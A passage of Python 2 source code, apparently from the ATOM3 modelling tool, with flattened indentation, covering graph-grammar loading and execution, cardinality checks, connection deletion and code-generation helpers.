# File dialog was cancelled
if( not fileName): return
# Check if the file actually exists
if( not os.path.exists( fileName ) ):
tkMessageBox.showerror( "File Not Found ",
"ATOM3.loadTrans() could not find:\n\n" + fileName,
parent = self )
return
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveTrans' ] = os.path.dirname( fileName )
dir, file = os.path.split(fileName) # Split path and file name
className = string.split (file, ".") # Separate file name and extension
# No className? Doh
if not className[0]: return
# Load the dir in memory and import the file
self.isLoadingModel = True
self.checkInSearchPath(dir)
exec "from "+className[0]+" import *\n" in self.__dict__, self.__dict__
try:
self.savedTrans(self) # call method to load data
self.isLoadingModel = False
except AttributeError:
tkMessageBox.showerror(
"Couldn't load transformation! (AttributeError)",
"Selected file "+file+" does not contain a valid transformation",
parent = self
)
self.isLoadingModel = False
raise
#raise Exception, "Transformation load failed due to 'AttributeError'"
except TypeError:
tkMessageBox.showerror(
"Couldn't load transformation! (TypeError)",
"Selected file "+file+" does not contain a valid transformation",
parent = self
)
self.isLoadingModel = False
raise Exception, "Transformation load failed due to 'TypeError'"
else:
self.isLoadingModel = False
transName = self.EditingGraphGrammar.Name.toString()
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.LOAD, transName, fileName )
if self.console: self.console.appendText('Loading transformation '+transName+' from file '+fileName)
if(editAfterLoading):
self.editTrans()
def executeTrans(self):
"""
Loads an executable Graph Grammar and executes it on the actual graph...
"""
if not self.coupledGG:
self.coupledGG = GrammarExecution(self)
exeT = ATOM3TypeDialog(self, self.coupledGG )
if exeT.result_ok: # OK pressed...
# Get the attributes values
graphGrammars, stepByStep, entitiesMove, animate, execution = self.coupledGG.getValue()
else: return
t = time.time()
self.GraphGrammars = [] # Empty the list of loaded Graph Grammars
for gg in graphGrammars: # For each Graph Grammar
fileName, directory = gg.getValue()
# separate file name and extension
className = string.split (fileName, ".")
# Import the selected file...
if className[0]: # if successful...
self.checkInSearchPath(directory)
# first check if it has been loaded before, to force a recompilation
if className[0] in sys.modules.keys(): # file has already been loaded
text = "This GraphGrammar already exists in memory!\n\n"
text += 'If you have modified the GG, and do not flush the old'
text += ' GG, you will be executing the old GG'
openDialog = Dialog.Dialog(None, {'title': 'WARNING',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Proceed','Flush GG from memory',
'Cancel')})
if(openDialog.num == 2):
return
elif(openDialog.num == 1):
# This is the existing graph grammar in memory, kill the rules
# that it will have imported, as well as the GG itself.
GG = sys.modules[className[0]]
if( hasattr( GG, 'importedModules') ):
for iModule in GG.importedModules:
del sys.modules[iModule]
del sys.modules[className[0]] # delete to force a reload
else:
# Already in memory, just re-use it
self.GraphGrammars.append(self.name2GGdict[className[0]])
continue
# Now the GG is loaded into memory
exec "from "+className[0]+" import *\n" # import the file name
try:
GG = eval(className[0])(self) # create an instance of the last GG loaded
except NameError:
tkMessageBox.showerror(
"Couldn't execute transformation! (NameError)",
"Selected file "+fileName+" does not contain a valid transformation",
parent = self
)
GG = eval(className[0])(self) # Give the actual run-time error
return
except TypeError:
tkMessageBox.showerror(
"Couldn't execute transformation! (TypeError)",
"Selected file "+fileName+" does not contain a valid transformation",
parent = self
)
GG = eval(className[0])(self) # Give the actual run-time error
return
if self.console: self.console.appendText('Executing transformation '+GG.__class__.__name__)
self.GraphGrammars.append(GG) # append it to the list
self.name2GGdict[className[0]] = GG
self.grs = GraphRewritingSys(self, self.GraphGrammars, self.ASGroot) # create a new rewriting system
self.grs.evaluate(stepByStep[1], entitiesMove[1], execution[1], self.genGraphics, animate[1])# evaluate the GG using the current graph
self.closeUnusedMetaModels() # Modified 09 Sep 2002 by JL
if( PRINT_TIME_INFO ):
print "GG loaded in: %.3f seconds\n" % ( time.time() - t )
def closeDialog (self, unused, eventx, eventy):
ct = self.find_visible_closest(eventx, eventy, self.UMLmodel) # find the closest thing
tags = self.UMLmodel.gettags(ct) # get the tags
if tags:
if len(tags) >= 2 and tags[1][:4] == 'ASG_': # it's an embedded model
# open an instance of ATOM3 to select the entity to connect to
obj = VisualObj.Tag2ObjMap[tags[0]] # get the graphical object
ma = ATOM3TypeDialog(self, obj.semanticObject, ATOM3TypeDialog.OPEN, ( None, self.setConnectMode))
elif tags[0][:3] == 'Obj': # then it's a class
if self.ATOM3parent.fromClass and self.ATOM3parent.toClass: # it is the 2nd one
self.ATOM3parent.sem_objTo = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get the semantic object
else: # it is the 1st one
self.ATOM3parent.sem_objFrom = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get the semantic object
self.dialogInstance.ok()
del self.dialogInstance
del self.ATOM3parent
def setEditGGLabel (self, AT3Dialog, ATOM3instance, semanticObject):
"Sets the flag to edit the Graph Grammar Numbering Label conveniently"
semanticObject.editGGLabel = self.editGGLabel
def checkCardinalities(self, objFrom, objTo):
"""
Before connecting these two objects, check if the connection is valid. If it is valid, it returns None, if invalid, returns a
tuple with the error. The 1st component of the tuple is the error message, the second one is the actual object (to be highlighted)
"""
classFrom, classTo = objFrom.__class__.__name__, objTo.__class__.__name__
cardinality1 = self.CardinalityTable[classFrom][classTo] # get cardinality info
cardinality2 = self.CardinalityTable[classTo][classFrom] # get cardinality info
if cardinality1 == [] or cardinality2 == []: # if something is missing, then raise an error
return ("Objects of types "+classFrom+" and "+classTo+" cannot be connected.", objFrom)
card1 = self.checkDirectionOfCardinality(cardinality1, "Source") # Check that the direction of connection is allowed
if not card1:
if objFrom.keyword_:
return ("Wrong connection direction for object: "+objFrom.keyword_.toString(), objFrom)
else:
return ("Wrong connection direction for source object.", objFrom)
numObjects1 = self.countObjectOfClass(objFrom.out_connections_, objTo.__class__.__name__)
min1, max1 = self.getCardinalityValues(card1)
if numObjects1 > max1:
if objFrom.keyword_:
return ("Too many objects of type "+classTo+" connected to "+objFrom.keyword_.toString(), objFrom)
else:
return ("Too many objects of type "+classTo+" connected to source object", objFrom)
card2 = self.checkDirectionOfCardinality(cardinality2, "Destination") # Check that the direction of connection is allowed
if not card2:
if objTo.keyword_:
return ("Wrong connection direction for object: "+objTo.keyword_.toString(), objTo)
else:
return ("Wrong connection direction for destination object.", objTo)
numObjects2 = self.countObjectOfClass(objTo.in_connections_, objFrom.__class__.__name__)
min2, max2 = self.getCardinalityValues(card2)
if numObjects2 > max2:
if objTo.keyword_:
return ("Too many objects of type "+classFrom+" connected to "+objTo.keyword_.toString(), objTo)
else:
return ("Too many objects of type "+classFrom+" connected to source object", objTo)
return None
def getCardinalityValues (self, cardinality ):
"""
gets the numeric values of the cardinality tuple
"""
if cardinality[0] in ["n", "N", "m", "M"]: min = 1000000
else: min = int(cardinality[0])
if cardinality[1] in ["n", "N", "m", "M"]: max = 1000000
else: max = int(cardinality[1])
return (min, max)
def hardCardinalityCheck(self, node):
"""
Performs a cardinality check of node 'node'. If the check is not passed, then a tuple with the error is returned, else None.
"""
entities = self.CardinalityTable.keys() # Get the type of nodes we will have to check...
nodeClass= node.getClass() # Get node's class name
for entity in entities:
if entity in self.CardinalityTable[nodeClass].keys():
cards = self.CardinalityTable[nodeClass][entity] # Get cardinalities to check.
for card in cards:
if card[2] == "Source": theList = node.out_connections_
else: theList = node.in_connections_
numObjects = self.countObjectOfClass(theList, entity)
min, max = self.getCardinalityValues ( card )
if numObjects < min:
if node.keyword_:
return ("Too few objects of type "+entity+" connected to "+node.keyword_.toString()+"("+str(min)+" are needed)", node)
else:
return ("Too few objects of type "+entity+" connected to source object ("+str(min)+" are needed)", node)
elif numObjects > max:
if node.keyword_:
return ("Too many objects of type "+entity+" connected to "+node.keyword_.toString()+"( "+str(max)+" is the maximum)", node)
else:
return ("Too many objects of type "+entity+" connected to source object ( "+str(max)+" is the maximum)", node)
return None
def checkModel(self):
"""
Iterates over all the objects of the model, performing a hard cardinality check.
"""
for nodeType in self.ASGroot.listNodes.keys():
for object in self.ASGroot.listNodes[nodeType]:
res = self.hardCardinalityCheck(object) # perform a 'hard' cardinality check...
if res: return res
return None
def countObjectOfClass(self, objectList, className):
"""
Count the number of objects of class 'className' that there are in objectList
"""
counter = 0
for obj in objectList:
if obj.getClass() == className: counter = counter + 1
return counter
def checkDirectionOfCardinality(self, cardInfo, direction):
"""
cardInfo is a list of tuples with a connection information: (min, max, 'direction'). Tries to find a tuple that has the
direction 'direction'.
"""
card1 = None
for card in cardInfo: # look for source information for objFrom
if card[2] == direction:
card1 = card
break
return card1
def deleteGraphicalConnections(self, node):
"deletes graphical connections of the given entity"
obj = node.graphObject_
obj.erase(self) # Modified Aug 9, 2005 by Denis Dube
# while obj.connections != []:
# c = obj.connections[0]
# obj.connections.remove(c)
# self.UMLmodel.delete(c[0])
return obj
def showGraphicalConnections(self, node):
"Given the node 'node', shows its connections (none of them must be visible!)"
for conObject in node.in_connections_:
if node.graphObject_.hasGraphicalConnection(conObject.graphObject_) < 0: # no connections between them...
self.fromClass = conObject.graphObject_.tag
self.toClass = node.graphObject_.tag
self.showConnection(conObject.graphObject_.tag, node.graphObject_.tag)
self.fromClass = None
self.toClass = None
for conObject in node.out_connections_:
if node.graphObject_.hasGraphicalConnection(conObject.graphObject_) < 0: # no connections between them...
self.fromClass = node.graphObject_.tag
self.toClass = conObject.graphObject_.tag
self.showConnection(node.graphObject_.tag, conObject.graphObject_.tag)
self.fromClass = None
self.toClass = None
def deleteGraphicsOfSemanticEntity (self, node):
"deletes the corresponding graphic entity of the given node"
obj = self.deleteGraphicalConnections(node)
cts = self.UMLmodel.find_withtag(obj.tag)
for c in cts: self.UMLmodel.delete(c)
def getConnectedEntities (self, grHandler):
"Returns a tuple with the semantic entities connected by grHandler"
source, destination = None, None
for nt in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nt]:
if node.graphObject_: # if node has graphical Object
htuple = node.graphObject_.hasConnectHandler(grHandler) # see if the object has this handler
if htuple:
if htuple[1] == 0: source = node
else: destination = node
return (source, destination)
def deleteConnection(self, handler, tag):
"""
Deletes the connection given by handler,
invoking the corresponding pre and post action
-Modified by Denis to take hyperedges into full account
"""
obj = VisualObj.Tag2ObjMap[tag] # obtain the visual object
connSemantic = obj.semanticObject # obtain the semantic object
# Preconditions
# Root
res = self.ASGroot.preCondition(ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
# Connnection
res = connSemantic.preCondition(ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
sourceList = connSemantic.in_connections_
destinationList = connSemantic.out_connections_
# Sources
for source in sourceList:
for destination in destinationList:
res = source.preCondition (ASGNode.DISCONNECT,destination, "SOURCE" )
if res:
self.constraintViolation(res)
return
# Destinations
for destination in destinationList:
for source in sourceList:
res = destination.preCondition (ASGNode.DISCONNECT, source, "DESTINATION")
if res:
self.constraintViolation(res)
return
# Pre-actions
# Root
self.ASGroot.preAction(ASGNode.DISCONNECT)
# Connection
connSemantic.preAction(ASGNode.DISCONNECT)
# Sources & Destinations
for source in sourceList:
for destination in destinationList:
source.preAction(ASGNode.DISCONNECT, destination, "SOURCE")
for destination in destinationList:
for source in sourceList:
destination.preAction(ASGNode.DISCONNECT, source, "DESTINATION")
#
# Now check if we have to erase it from a named port (added 7 Oct 2002)
#
namedPort_Source = None
namedPort_Destination = None
for source in sourceList:
namedPort_Source = source.graphObject_.getNamedPort(handler)
if namedPort_Source:
if(obj.semanticObject in source.getAttrValue(namedPort_Source)):
source.getAttrValue(namedPort_Source).remove(obj.semanticObject)
else:
print 'WARNING (deleteConnection): Remove source failed', __file__
for destination in destinationList:
namedPort_Destination = destination.graphObject_.getNamedPort(handler)
if namedPort_Destination:
if(obj.semanticObject in destination.getAttrValue(namedPort_Destination)):
destination.getAttrValue(namedPort_Destination).remove(obj.semanticObject)
else:
print 'WARNING destination.getAttrValue(namedPort_Destination): Remove destination failed', __file__
#
# End named port processing...
#
# Delete graphical and semantic connections
link_removed = obj.removeConnection(self, handler)
# This is needed when deleting hyperedges
for source in sourceList:
for destination in destinationList:
if( source != None and source.graphObject_ != None and
issubclass( destination.graphObject_.__class__, graphLink ) ):
source.graphObject_.removeConnection(self, handler)
if( obj.centerObject and VisualObj.Tag2ObjMap.has_key( obj.centerObject.tag ) ):
self.deleteRealEntity( obj.centerObject.tag )
for destination in destinationList:
destination.graphObject_.removeConnection(self, handler) # may be destination is None (an unconnected connection)
for source in sourceList:
for destination in destinationList:
self.deleteSemConnection( [source, destination] )
if link_removed == 2: # a 2 means that the whole link has been removed
obj.semanticObject.removeNode()
# Post Conditions
res = self.ASGroot.postCondition (ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
res = connSemantic.postCondition (ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
for source in sourceList:
for destination in destinationList:
res = source.postCondition (ASGNode.DISCONNECT,destination, "SOURCE" )
if res:
self.constraintViolation(res)
return
for destination in destinationList:
for source in sourceList:
res = destination.postCondition (ASGNode.DISCONNECT, source, "DESTINATION")
if res:
self.constraintViolation(res)
return
# Disconnect root, connection, source, destination POST ACTIONS
self.ASGroot.postAction(ASGNode.DISCONNECT)
for source in sourceList:
for destination in destinationList:
#print 'source', source.__class__.__name__, 'disconnect'
source.postAction(ASGNode.DISCONNECT, destination, "SOURCE")
connSemantic.postAction(ASGNode.DISCONNECT, destination, "SOURCE")
for destination in destinationList:
for source in sourceList:
#print 'destination', destination.__class__.__name__, 'disconnect'
destination.postAction(ASGNode.DISCONNECT, source, "DESTINATION")
connSemantic.postAction(ASGNode.DISCONNECT, source, "DESTINATION")
#================================================================================
#Hierarchical structure maintenance, see HierarchicalASGNode.py for more info
#================================================================================
if(connSemantic.isHierarchicalLink()):
for parent in sourceList :
parent._delHierChildrenList(destinationList)
for child in destinationList:
child._delHierParent()
def deleteSemConnection (self, objects):
""" delete the connections from the semantic entities..."""
if( objects[0] == None or objects[1] == None ):
print "\nWARNING: Nothing to delete! Atom3.deleteSemConnection() ", objects
return
# Unary relations: both ends of connection are the same object
if( not objects[0]) :
objects[0] = objects[1]
elif( not objects[1] ):
objects[1] = objects[0]
# Remove 1 from 0's outgoing connections
if( objects[1] in objects[0].out_connections_ ):
objects[0].out_connections_.remove(objects[1])
# Remove 0 from 1's incomming connections
if( objects[0] in objects[1].in_connections_ ):
objects[1].in_connections_.remove(objects[0])
self.mode = self.IDLEMODE
def changeMode (self, event):
"""
Changes the mode (the user clicked in a button created on the fly).
If the mode ends with "&&EXEC" then it is not a drawing mode and the method should be executed right away (Added 27 July 2002, JL)
"""
self.mode = self.modes[event.widget]
if find (self.mode, "&&EXEC") > -1: # ey, not a drawing mode... (Added 27 July 2002, JL)
action = self.mode
self.mode = self.IDLEMODE # set back to idle mode
self.userActionsMap[action](self, 0, 0) # in this case, no information about the click coordinates
def newModeModel(self):
"""
enters in the INSERTModel mode
"""
self.mode = self.INSERTModel
def expandModeModel(self):
"""
enters in the EXPANDModel mode
"""
self.mode = self.EXPANDModel
def highLightGraphs(self, graphList, flag = True):
"""
highlights all the graphs contained in the list for the user to select one.
- graphList: is a list of graphs. A graph is a tuple ( <id>, [nodes]). Where id is an integer and
[nodes] is a list of nodes. Enters in the mode SELECTgraph
"""
self.graphs2select = graphList # save the list, because, we'll have to wait for the user to click on some node
self.highLightNodesInGraphs(self.graphs2select, flag) # Highlight each node
self.mode = self.SELECTgraph # put system in select graph mode
def selectGraph(self, unUsed, wx, wy):
"""This function is called when the user clicks on canvas and the mode is SELECTgraph"""
x, y = self.UMLmodel.canvasx(wx), self.UMLmodel.canvasy(wy) # convert to canvas coordinate system
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags and tags[0] != 'current': # i.e. we don't have a connection
obj = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get semanticObject
# Now look for the graph whose node have been clicked
for graphTuple in self.graphs2select:
id, graph = graphTuple # unwrap graph information
if obj in graph: # ey, we've found the subraph that's been clicked
self.mode = self.IDLEMODE # only if the clicked node belongs to some graph return to IDLE state
self.highLightNodesInGraphs(self.graphs2select, 0) # un-Highlight each node
self.grs.executeRule(graphTuple) # execute the rule that's been selected
self.graphs2select = []
return
def highLightNodesInGraphs(self, graphList, flag):
"""
Highlights (flag = 1) or LowLights (flag = 0) all the VISIBLE elements with the 'selected' tag.
- graphList: is a list of tuples (id,[node])
"""
highLighted = [] # list of highlighted nodes (do not highlight them twice, or we'll lost their color)
for grp in graphList: # for each graph
id, graph = grp
for node in graph:
if not node in highLighted: # if not highlighted yet, do it
node.graphObject_.HighLight( flag)
highLighted.append(node)
def __isItemVisible (self, itemHandler, canvas ):
"""
Returns 1 if the item is visible, 0 otherwise
"""
# itemtype = canvas.type(item)
# if( itemtype == 'image' ): return 1
# elif not itemtype in ['line', 'text']:
# if (canvas.itemcget(item, "outline" ) in ["", None]) and (canvas.itemcget(item, "fill") in ["", None]): return 0
# else: return 1
# else:
# if canvas.itemcget(item, "fill") in ["", None]: return 0
# else: return 1
# return 1
dc = canvas
itemtype = dc.type(itemHandler)
# Images
if(itemtype == 'image'):
return True
# Line/Text uses the fill attribute to be visible
elif(itemtype in ['line', 'text']):
if(dc.itemcget(itemHandler, "fill") in ["", None]):
return False
return True
# Window
elif(itemtype == 'window'):
return False
# Anything else: polygon, etc.
else:
if(dc.itemcget(itemHandler, "outline") in ["", None]
and dc.itemcget(itemHandler, "fill") in ["", None]):
return False
return True
def __dist ( self, x0, y0, x1, y1 ):
"""
calculates the distance between 2 points
Added : 10 July 2002 JL
"""
return math.sqrt(abs((x0-x1)*(x0-x1)+(y0-y1)*(y0-y1)))
def __point2Segment ( self, px, py, sx0, sy0, sx1, sy1):
"""
calculates distance from a point to a segment. I use the algorithm given in:
http://geometryalgorithms.com/Archive/algorithm_0102/algorithm_0102.htm
Added : 10 July 2002 JL
"""
def dot ( w, v):
"""
calculates the dot product of two vectors
"""
return w[0]*v[0]+w[1]*v[1]
v = (sx1 - sx0, sy1 - sy0) # v = s[1]-[s0]
w = (px - sx0, py - sy0) # w = P-s[0]
c1 = dot(w,v)
if ( c1 <= 0 ): return self.__dist(px, py, sx0, sy0)
c2 = dot(v,v)
if ( c2 <= c1 ): return self.__dist(px, py, sx1, sy1)
b = c1 / c2
Pb = sx0 + b * v[0], sy0 + b * v[1]
return self.__dist(px, py, Pb[0], Pb[1])
def constraintViolation(self, res):
"""
A constraint violation has occurred, and a message has to be given. The message is the 1st component
of the tuple 'res'. The 2nd component is the object to be highlighted.
"""
if res[1] and (type(res[1])!= StringType):
if issubclass(res[1].__class__, VisualObj):
res[1].HighLight(1)
elif issubclass( res[1].__class__, ASGNode):
res[1].graphObject_.HighLight(1)
tkMessageBox.showwarning("constraint violation! ",res[0],parent = self)
if res[1] and type(res[1])!= StringType:
if issubclass(res[1].__class__, VisualObj):
res[1].HighLight(0)
elif issubclass( res[1].__class__,ASGNode):
res[1].graphObject_.HighLight(0)
return 0
def writeSetValue(self, f, obj, objName, indent, deep = 0):
"""
writes in the file 'f' the value of obj (an ATOM3Type). The object name must be objName.
This is a 'visitor' method.
"""
f.write(indent+objName+"="+obj.getTypeName()+"()\n") # write the constructor
if obj.getTypeName() == 'ATOM3String': # if it is a string, enclose between quotes
f.write(indent+objName+".setValue('"+str(obj.getValue())+"')\n")
elif obj.getTypeName() == 'ATOM3List': # if it is a list
f.write(indent+"objlist"+str(deep)+" =[]\n")
value = obj.getValue()
for ob in value:
self.writeSetValue(f, ob, objName+str(deep+1), indent, deep+1) # write object value
f.write(indent+"objlist"+str(deep)+".append("+objName+")\n")
f.write(indent+objName+".setValue(objlist"+str(deep)+")\n")
actFlags = obj.getActionFlags() # get the ATOM3List
actFlags = actFlags[:3].append(0) # eliminate the meta-flag
f.write(indent+objName+".setActionFlags("+str(actFlags)+")\n")
else:
f.write(indent+objName+"="+obj.getTypeName()+"()\n") # write the constructor
f.write(indent+objName+".setValue("+str(obj.getValue())+")\n")
def findKeywordAndIcons(self, f, item, counter):
"""Searches for the keyword attribute and icons. Writes the keyword (if any). This ensures that the keyword is written first.
- f is the file
- item is an instance of ATOM3Attribute
- counter: the order of the attribute
This is a 'visitor' method to be called by visitorOnAttributes, for code generation purposes.
"""
value = item.getValue() # (attrName, typeID, initialValue|None, isKey, directEditing)
if value[3][1] == 1: # only write to file if it is the keyword.
item.initialValue.writeConstructor2File( f, ' ', 'self.'+str(value[0]), 0, 1 )
f.write(' self.keyword_= self.'+str(value[0])+'\n')
self.theKeyword = str(value[0])
if value[1] == "Appearance": # if it has an attribute of type appearance, write it down. If it has an appearance...
self.hasAppearance = 1 # ... it must also have a keyword.
attribType = self.types[str(value[1])][0].__name__
if attribType == 'ATOM3List':
if item.initialValue:
itl = item.initialValue.itemType.__name__ # get the initial value...
if itl == "ATOM3Appearance":
self.hasAppearance = 1
elif itl in ["ATOM3List", "ATOM3Attribute"]:
items = item.initialValue.getValue() # get items, and look for 'Appearances'
for element in items:
if self.findIcon(element): return
def findIcon(self, item):
"""
Sets the flag 'self.hasAppearance' to 1 if the item is an ATOM3Appearance. Proceeds recursively if the item is an
ATOM3Attibute or a list. This is an auxiliary method for code generation.
"""
if item.getTypeName() == "ATOM3Appearance": # check if it is an appearance...
self.hasAppearance = 1
return 1
elif item.getTypeName() == "ATOM3List":
theType = item.itemType.__name__ # get the Type...
if theType == "ATOM3Appearance":
self.hasAppearance = 1
return 1
elif theType in ["ATOM3List", "ATOM3Attribute"]:
items = item.getValue() # get items, and look for 'Appearances'
for element in items:
if self.findIcon(element): return 1
return 0
elif item.getTypeName() == "ATOM3Attribute":
if item.initialValue: return self.findIcon(item.initialValue) # check the initial value
return 0
return 0
def writeCreation(self, f, item, counter):
"""writes in f the statements necessary to create the object. Does not write the keyword, because the previous function was supposed to do it.
- f is the file
- item is an instance of ATOM3Attribute
- counter: the order of the attribute
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue() # (attrName, typeID, initialValue|None, isKey, directEditing)
if value[1] == 'Port': # if it is a Port... (Added by JL, 24 July 2002)
f.write(' self.'+str(value[0])+' = []\n')
return
if value[3][1] != 1: # only write it if it is not a keyword.
item.initialValue.writeConstructor2File( f, ' ', 'self.'+str(value[0]), 0, 1 )
if value[1] == "Appearance": # if it has an attribute of type appearance, write it down. If it has an appearance...
self.hasAppearance = 1 # ... it must also have a keyword.
def writeGeneratedDictionary(self, f, item, counter):
"""
write in f the contents of the dicitionary of generated attributes.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
if value[1] != 'Port': # Added 24 July 2002 by JL
if self.writed == 1:
f.write(",\n ")
f.write( "'"+str(value[0])+"': ('ATOM3"+str(value[1])+"'")
if value[1] == 'List' and item.initialValue.itemType: # Added 25 July 2002 by JL
f.write(", '"+item.initialValue.itemType.__name__+"')") # Added 25 July 2002 by JL
else:
f.write(", )")
self.writed = 1
def writeDirectEditingList (self, f, item, counter):
"""
write in f the contents of the list with the flag that tells if the widget should be edite directly.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
Added 31 July 2002, by JL.
"""
value = item.getValue()
if self.writed == 1: f.write(",")
f.write( str(value[4][1]) )
self.writed = 1
def writeRealOrderList(self, f, item, counter):
"""
write in f the contents of the list with the order of generated attributes.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
if value[1] != 'Port': # Added 24 July 2002 by JL
if self.writed == 1: f.write(",")
f.write( "'"+str(value[0])+"'")
self.writed = 1
def genImport(self, f, item, counter):
"""
adds in the list importedTypes the necessary types to be imported.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
attribType = self.types[str(value[1])][0].__name__
if not attribType in self.importedTypes:
self.importedTypes.append(attribType)
# if it is a list, import the list' type
if attribType == 'ATOM3List':
if item.initialValue:
itl = item.initialValue.itemType.__name__
if not itl in self.importedTypes:
self.importedTypes.append(itl)
if itl == "ATOM3Attribute":
self.addAllTypes2List(self.importedTypes)
elif itl == "ATOM3List":
# no look for initial items, and import each one type...
initialItems = item.initialValue.getValue() # get a list of items...
for item in initialItems:
self.addItemType2List(item, self.importedTypes)
if initialItems == []: # no initial items, so add the default type for lists (attributes)
if not "ATOM3Attribute" in self.importedTypes:
self.importedTypes.append("ATOM3Attribute")
# if it is of type ATOM3Attribute, then add all the available types...
self.addAllTypes2List(self.importedTypes)
else:
if not "ATOM3Attribute" in self.importedTypes:
self.importedTypes.append("ATOM3Attribute")
# if it is of type ATOM3Attribute, then add all the available types...
self.addAllTypes2List(self.importedTypes)
def addAllTypes2List(self, list):
"""
Auxiliary method for genImport. adds the name of all the available types to the list
"""
for typeName in self.types.keys():
tupleType = self.types[typeName]
name = tupleType[0].__name__
if not name in list: list.append(name)
def addItemType2List(self, item, list):
"""
Auxiliary method for genImport. adds the type of item to the list (if it is not present yet)
"""
theType = item.getTypeName()
if not theType in list: list.append(theType)
if theType == "ATOM3List": # check for its initial value, and repeat for each item
# import the list' type:
theType = item.itemType.__name__
if not theType in list: list.append(theType)
if theType == "ATOM3Attribute" : # check for it is an Attribute, we have to add each available type...
self.addAllTypes2List(list)
def visitorOnAttributes(self, f, UMLobject, function):
"""
iterates over the attributes of type ATOM3Attribute of the object UMLobject, performing a certain function
"""
self.writed = 0
counter = 0 # an auxiliary counter
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Attribute':
function(f, UMLobject.getAttrValue(attr), counter) # perform function
counter = counter + 1 # increment counter
elif type[0] == 'ATOM3List' and type[1] == 'ATOM3Attribute': # A list of generative elements...
items = UMLobject.getAttrValue(attr).getValue() # obtain a list of generative elements
for item in items: # look over the array
function(f, item, counter)
counter = counter + 1
return counter
def writeActionConstraint (self, file, value, which):
"""
writes part of the function to evaluate local constraints
These are 'visitor' methods called by visitorOnConstraints for code generation purposes.
"""
listAct, selAct = value[3]
listKnd, selKnd = value[2]
# Abort if there's no code...
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(len(tempCode) == 0):
return
if listKnd[selKnd] == which:
# iterate on the specified event...
file.write(" if actionID == ")
conta = 0
writed = 0
for event in selAct:
if event == 1:
if not writed:
file.write("self."+listAct[conta])
else:
file.write(" or actionID == self."+listAct[conta])
writed = 1
conta = conta + 1
file.write(":\n")
file.write(" res = self."+value[0]+"(params)\n")
file.write(" if res: return res\n")
def writeConstraintCode (self, file, value, unUsed):
"""
writes the constraint code.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
# Abort if there's no code...
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(len(tempCode) == 0):
return
file.write (" def "+value[0]+"(self, params):\n")
file.write (" "+string.replace(value[4],'\n', '\n '))
file.write ("\n\n")
def visitorOnConstraints (self, which, file, UMLobject, function ):
"""
Generates code for the constraints. In a 'visitor' pattern way.
"""
# find a list of constraints, or a single constraint generator
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if( type[0] == 'ATOM3Constraint' ):
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
function(file, value, which)
elif( type[0] == 'ATOM3List' and type[1] == 'ATOM3Constraint' ):
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
function(file, value, which)
def writeDirectionalCheck(self, file, value, counter, direct):
"""
Generates type checking for the connection direction
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple with (className, direction, minValue, maxValue)
className, direction, minVal, maxVal = value # unpack the values
if direction[1] == direct: # check the constraint direction
if self.writedDirection == 0: # if it is the 1st., begin the if
file.write(" if ")
self.writedDirection = 1
else:
file.write(" and ")
file.write("( last.getClass()!='"+value[0]+"') ")
def writeObjectTypeCheck(self, file, value, counter):
"""
Generates the type checking for the connection
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
if counter == 0: # if it is the first cardinality, add some preliminary code
file.write(" if selfPosition == 'SOURCE':\n")
file.write(" last=self.out_connections_[len(self.out_connections_)-1]\n")
file.write(" else:\n")
file.write(" last=self.in_connections_[len(self.in_connections_)-1]\n")
file.write(" if ")
else:
file.write(" and ")
file.write("( last.getClass()!='"+value[0]+"') ")
def writeSoftCardinalityCheck(self, file, value, counter):
"""
Generates soft (not taking into account minimum values) cardinality checking
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple (<objectCLass>, <direction>, <minValue>, <maxValue>)
objectClass, direction, minValue, maxValue = value # unpack ATOM3Connection value
file.write(" counter = 0\n") # cardinality counter
if direction[1] == 0: # From Entity TO relationship
file.write(" for item in self.in_connections_:\n") # WE ARE A RELATIONSHIP
else:
file.write(" for item in self.out_connections_:\n")
file.write(" if '"+ objectClass +"'== item.getClass(): counter = counter+1\n")
if not maxValue in ["n", "N", "m", "M"] :
file.write(" if counter > "+maxValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects exceeded!', '')\n")
def writeHardCardinalityCheck(self, file, value, counter):
"""
Generates hard (taking into account minimum values) cardinality checking
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple (<objectCLass>, <direction>, <minValue>, <maxValue>)
objectClass, direction, minValue, maxValue = value # unpack ATOM3Connection value
file.write(" counter = 0\n")
if direction[1] == 0: # From Entity TO relationship
file.write(" for item in self.in_connections_:\n") # WE ARE A RELATIONSHIP
else:
file.write(" for item in self.out_connections_:\n")
file.write(" if '"+ objectClass +"'== item.getClass(): counter = counter+1\n")
if not maxValue in ["n", "N", "m", "M"] :
